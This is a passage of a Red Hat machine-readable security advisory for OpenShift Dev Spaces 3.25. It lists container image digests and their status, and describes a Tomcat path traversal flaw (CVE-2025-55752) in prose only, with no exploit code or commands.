"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:46811ca65f64fb6d260e3dca253947c749b6dd31ce3185f36e729ea817f454a4_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:65b5989d68b4489a7d1b915870afc49c0f977b9690ee958be7e8fedcc611087f_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:7d38a9fe7e1bf493f235c62ebaabdc1c805b94e731186b9ffa56cf581abc8f77_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:869bac1a7cc51c0a780667abd7b47f9e42f2da22e6d6a57b5a1d7ecdeddcee7c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0a15c7b78d69e8711f81727879c1d4bbd8c2e8547a0b5c84513ea3a42fb5f8f3_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e34005d1fc54aaf8863c5f0bf4bdd30120e65df1a61a6e775f0998e0be152582_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e381c47978265d9db3daf279657a63cfe8f1f5afe0d00d4792b819cbae480338_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:fdbae1704685d51d583b0c2e588ddf3b088b78cc84b239821421042c0943c098_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:969198cbaa319f55733ae4fb378b867f8afb9d1bfe78dfce65b20fd7ac9fb541_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:a1ccad11e91784e0b6ed9eb1745d86c8783f1e869096a7f735f47280df0acc4e_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:b2c13795589df33fec7a6c6b5ed37e11db14f134bfcc7ee0350e3df372f5da88_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:e6f11881adb8f1675e5e3372339e648d99084d7d3f244d0de1eeebc96ed08dfc_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:6137931395a4cbfa07e5579172ed579babd14a2d1e054238298eee1aee4e2c07_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:804b00736484cc574e738130b9dc0e553828f54705fed29dbd9bb873bc5d1baa_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:8cf6cd46eef5fea2e500e14b18a8ec545b5bec93e6fb2289a9d760d56e4b52bb_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:d17a2f913e7cef538d6537d0ad32e257e2d51c871fc66183ea291024e8e2afae_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:74b83b79cba88af0545e7fb52dd70df2c1b96cf23b8963517fc779fbfe3e9aac_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:46948834924666487d7f47ac11bed7655e936fdb7071ee32d1ae3b1bb1a69aa4_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:690264c2631bd5a2341b37c1d3099a84e9bfb5eb2afab2937c0453a2475d0111_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a4417f71e76b15d9c4f1c4657b2e5f2bb3979d498b362b42d9b207e37bf505d5_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:c7871f233d3908f052954b132aa6c7b57c500e41899f02ac023098e2283380c5_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:70d4bfd4a877934fbdded33e39c349b3554bc371492ee2696260916b0119efcf_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:859b5a54204008d575e774ca4794c346c0195750b5617ae56dccaf3dfa3d3f1b_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:bc65597fade1fd7de78ab27d9b0ba1bf5317b56949a9277e0af4b32db1aaee48_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:cfa0ae37ba69921586906f410956f9cd7d4a27652a544d3363c7d2dc92603286_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:29fa5d30eafda6658cf2c4a655e82e075b5708ddc1ff1b6d27c082f96c33a95d_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:56bed332699e952d3b4f4672420c379fa32954e77bb24aa3fec51823a0473703_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:8714c6e69cdc81f39c44a4d17dda5a4574e104eafeb6d3deb5f29b879e5f0f99_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:94a3bd9690ce19b7dcab8784e9edaf39a52085d84561659b5ea2e955d375f37e_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:296a441f00d4749301a9aee06a998f29ac64bb9c50d7e090711b33776a845f03_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:4ea445ee2670945ac2be3fe503be6f44d4ff4a953deffe9dc61fb4a8a30ae5a8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:84b61272c472cee00404abd49080bd492dbe63a72ebc9bdcef48dac74b72b455_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:cca33584e4afced97c7c3c35af261890279a540df0f2da4d263e8862e2c14c6c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:31e999abdb05d9dd572f21a91982bc8bfbb2007f1100650715c51d40f6f1f312_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:5b136fff0f0c8ff4d56fdb934eef1dd7d04ebdac13e7cb8c1e020bf370f4df84_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:8642741c5122757b5a01ee03e5a514a4d49b4048c6808b14ab5f8b7cece82d11_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:a353e11c2f965642a1107d7b764edccd0888009fc991ec066fb40e4632692ac4_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:10821feaf0ba17ef30f0403d29862004615952e289af23794e15d3354bc4f288_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:4cba254ffcbe10a9da41c2b25cdb098824d3adfc207ce02f5c71200bd41c6959_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f67c1d7d8549587c1032404411b01472f71e775a7bbfd91927060c1b09a631c0_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fb455374d650d93bbc4eca5616d041067cf1bcebc0dd6d0a92d8af16e2656708_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:3a3da41883a104931b483ce6f5ff089a7fe3fa7b409a0b66ec1d8d396903f246_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:5898927ebcb955afdf51695a028b2e3fe4dfb08fb12d3e4daa75d1266562bdf9_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:eec12e74a1bf7348f827b6c49d97f8cf9d27199ce2d35330f92ae3330020785f_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:f7dbf103ed9452b48a61505498c8aa1e4f445e9bf40b62769fb16372597982d2_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:3e6de411cafc0aee65b36541803bebc84070ff69bab6f3f4691d65074fe36307_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:44c8d3d034803b0f8307b56cafdfcf8083071e407139e701456acfb2e434b0c8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:821f997cae0acae9048347c648c4f762a870b6548b8b7d14129315bf85b97276_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9ebbe3422e8100ef6e9c8ca7896ca21227ae4c708f3d3321fa2ca1c8eb9f051_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:53eb58d4a5f32aa71bb7e0d3beedca005b0b68f1fa9f18e07d08e243a803a565_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:63833e84093a729b0624238325e783fbcb1e22a7649dc1b59998bcce6ac450ef_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:a63f6e4ee48aaf257c592844674621110d1380f51d53d5bbf796b3bcafb67b89_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:d50d87f4bbcabaa25d7b8a4c09d956d0d8eec926bd1c01fa1a506266e2056162_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:1669477977f4722f931dba2693089f59ab77b5828869ec188e0bbff4966d7605_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5411419f1400a2e1345d430df21d5b6ae9fc00d99a89549d7bf889e82a8f350b_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:782034bb77a0657bd9515feff4d7cb31e259dae24ed322e350022fd901fb5187_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b8439f99e641c9f04e10a97f9a593b3909968ebd293381af2885b2b4ca7ac3e0_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:0b5b29e3626d7796c6a7ab73296934fd13717ca217e1bd42dc2ac39b0efdbf8a_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:72e67f67750d8cdb639ab2fc274063e622075e00ceda667a89b54c6e0d8de955_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:8a19af8b03b59562335b3a3f77753944c27ecbccaeda3400d0f089a6cd8d11fa_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:ef84715a61474b7a45b0b24c0d30370f51ab93ff86b70d5d345545253e01c3ae_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "dotnet: .NET Security Feature Bypass Vulnerability"
},
{
"cve": "CVE-2025-55752",
"cwe": {
"id": "CWE-23",
"name": "Relative Path Traversal"
},
"discovery_date": "2025-10-27T18:01:22.818037+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:46811ca65f64fb6d260e3dca253947c749b6dd31ce3185f36e729ea817f454a4_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:65b5989d68b4489a7d1b915870afc49c0f977b9690ee958be7e8fedcc611087f_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:7d38a9fe7e1bf493f235c62ebaabdc1c805b94e731186b9ffa56cf581abc8f77_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:869bac1a7cc51c0a780667abd7b47f9e42f2da22e6d6a57b5a1d7ecdeddcee7c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0a15c7b78d69e8711f81727879c1d4bbd8c2e8547a0b5c84513ea3a42fb5f8f3_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e34005d1fc54aaf8863c5f0bf4bdd30120e65df1a61a6e775f0998e0be152582_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e381c47978265d9db3daf279657a63cfe8f1f5afe0d00d4792b819cbae480338_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:fdbae1704685d51d583b0c2e588ddf3b088b78cc84b239821421042c0943c098_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:969198cbaa319f55733ae4fb378b867f8afb9d1bfe78dfce65b20fd7ac9fb541_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:a1ccad11e91784e0b6ed9eb1745d86c8783f1e869096a7f735f47280df0acc4e_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:b2c13795589df33fec7a6c6b5ed37e11db14f134bfcc7ee0350e3df372f5da88_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:e6f11881adb8f1675e5e3372339e648d99084d7d3f244d0de1eeebc96ed08dfc_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:6137931395a4cbfa07e5579172ed579babd14a2d1e054238298eee1aee4e2c07_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:804b00736484cc574e738130b9dc0e553828f54705fed29dbd9bb873bc5d1baa_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:8cf6cd46eef5fea2e500e14b18a8ec545b5bec93e6fb2289a9d760d56e4b52bb_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:d17a2f913e7cef538d6537d0ad32e257e2d51c871fc66183ea291024e8e2afae_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:74b83b79cba88af0545e7fb52dd70df2c1b96cf23b8963517fc779fbfe3e9aac_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:46948834924666487d7f47ac11bed7655e936fdb7071ee32d1ae3b1bb1a69aa4_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:690264c2631bd5a2341b37c1d3099a84e9bfb5eb2afab2937c0453a2475d0111_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a4417f71e76b15d9c4f1c4657b2e5f2bb3979d498b362b42d9b207e37bf505d5_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:c7871f233d3908f052954b132aa6c7b57c500e41899f02ac023098e2283380c5_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:70d4bfd4a877934fbdded33e39c349b3554bc371492ee2696260916b0119efcf_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:859b5a54204008d575e774ca4794c346c0195750b5617ae56dccaf3dfa3d3f1b_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:bc65597fade1fd7de78ab27d9b0ba1bf5317b56949a9277e0af4b32db1aaee48_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:cfa0ae37ba69921586906f410956f9cd7d4a27652a544d3363c7d2dc92603286_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:29fa5d30eafda6658cf2c4a655e82e075b5708ddc1ff1b6d27c082f96c33a95d_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:56bed332699e952d3b4f4672420c379fa32954e77bb24aa3fec51823a0473703_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:8714c6e69cdc81f39c44a4d17dda5a4574e104eafeb6d3deb5f29b879e5f0f99_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:94a3bd9690ce19b7dcab8784e9edaf39a52085d84561659b5ea2e955d375f37e_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:296a441f00d4749301a9aee06a998f29ac64bb9c50d7e090711b33776a845f03_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:4ea445ee2670945ac2be3fe503be6f44d4ff4a953deffe9dc61fb4a8a30ae5a8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:84b61272c472cee00404abd49080bd492dbe63a72ebc9bdcef48dac74b72b455_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:cca33584e4afced97c7c3c35af261890279a540df0f2da4d263e8862e2c14c6c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:31e999abdb05d9dd572f21a91982bc8bfbb2007f1100650715c51d40f6f1f312_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:5b136fff0f0c8ff4d56fdb934eef1dd7d04ebdac13e7cb8c1e020bf370f4df84_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:8642741c5122757b5a01ee03e5a514a4d49b4048c6808b14ab5f8b7cece82d11_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:a353e11c2f965642a1107d7b764edccd0888009fc991ec066fb40e4632692ac4_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:10821feaf0ba17ef30f0403d29862004615952e289af23794e15d3354bc4f288_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:4cba254ffcbe10a9da41c2b25cdb098824d3adfc207ce02f5c71200bd41c6959_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f67c1d7d8549587c1032404411b01472f71e775a7bbfd91927060c1b09a631c0_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fb455374d650d93bbc4eca5616d041067cf1bcebc0dd6d0a92d8af16e2656708_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:3e6de411cafc0aee65b36541803bebc84070ff69bab6f3f4691d65074fe36307_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:44c8d3d034803b0f8307b56cafdfcf8083071e407139e701456acfb2e434b0c8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:821f997cae0acae9048347c648c4f762a870b6548b8b7d14129315bf85b97276_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9ebbe3422e8100ef6e9c8ca7896ca21227ae4c708f3d3321fa2ca1c8eb9f051_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:53eb58d4a5f32aa71bb7e0d3beedca005b0b68f1fa9f18e07d08e243a803a565_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:63833e84093a729b0624238325e783fbcb1e22a7649dc1b59998bcce6ac450ef_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:a63f6e4ee48aaf257c592844674621110d1380f51d53d5bbf796b3bcafb67b89_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:d50d87f4bbcabaa25d7b8a4c09d956d0d8eec926bd1c01fa1a506266e2056162_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:1669477977f4722f931dba2693089f59ab77b5828869ec188e0bbff4966d7605_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5411419f1400a2e1345d430df21d5b6ae9fc00d99a89549d7bf889e82a8f350b_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:782034bb77a0657bd9515feff4d7cb31e259dae24ed322e350022fd901fb5187_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b8439f99e641c9f04e10a97f9a593b3909968ebd293381af2885b2b4ca7ac3e0_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:0b5b29e3626d7796c6a7ab73296934fd13717ca217e1bd42dc2ac39b0efdbf8a_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:72e67f67750d8cdb639ab2fc274063e622075e00ceda667a89b54c6e0d8de955_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:8a19af8b03b59562335b3a3f77753944c27ecbccaeda3400d0f089a6cd8d11fa_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:ef84715a61474b7a45b0b24c0d30370f51ab93ff86b70d5d345545253e01c3ae_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2406591"
}
],
"notes": [
{
"category": "description",
"text": "A directory traversal vulnerability in Apache Tomcat caused by improper URL normalization during request rewriting. When specific rewrite rules are used, an attacker could craft a malicious request to bypass access restrictions and reach protected directories such as /WEB-INF/ or /META-INF/. If HTTP PUT requests are also enabled, this flaw could allow the upload of malicious files, potentially leading to remote code execution.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "tomcat: org.apache.tomcat/tomcat-catalina: Apache Tomcat: Directory traversal via rewrite with possible RCE",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability is rated as Important rather than Critical because successful exploitation depends on specific, non-default configuration conditions. The flaw only becomes exploitable when both URL rewriting rules that modify the request path are in use and HTTP PUT requests are enabled \u2014 a feature typically restricted to administrative or trusted users. In standard Tomcat deployments, PUT is disabled or tightly controlled, and rewrite configurations rarely expose sensitive paths. Therefore, while the issue could theoretically lead to remote code execution, the limited attack surface and requirement for uncommon setup conditions significantly reduce its overall risk level.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:3a3da41883a104931b483ce6f5ff089a7fe3fa7b409a0b66ec1d8d396903f246_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:5898927ebcb955afdf51695a028b2e3fe4dfb08fb12d3e4daa75d1266562bdf9_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:eec12e74a1bf7348f827b6c49d97f8cf9d27199ce2d35330f92ae3330020785f_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:f7dbf103ed9452b48a61505498c8aa1e4f445e9bf40b62769fb16372597982d2_amd64"
],
"known_not_affected": [
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:46811ca65f64fb6d260e3dca253947c749b6dd31ce3185f36e729ea817f454a4_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:65b5989d68b4489a7d1b915870afc49c0f977b9690ee958be7e8fedcc611087f_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:7d38a9fe7e1bf493f235c62ebaabdc1c805b94e731186b9ffa56cf581abc8f77_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:869bac1a7cc51c0a780667abd7b47f9e42f2da22e6d6a57b5a1d7ecdeddcee7c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0a15c7b78d69e8711f81727879c1d4bbd8c2e8547a0b5c84513ea3a42fb5f8f3_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e34005d1fc54aaf8863c5f0bf4bdd30120e65df1a61a6e775f0998e0be152582_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e381c47978265d9db3daf279657a63cfe8f1f5afe0d00d4792b819cbae480338_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:fdbae1704685d51d583b0c2e588ddf3b088b78cc84b239821421042c0943c098_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:969198cbaa319f55733ae4fb378b867f8afb9d1bfe78dfce65b20fd7ac9fb541_arm64",
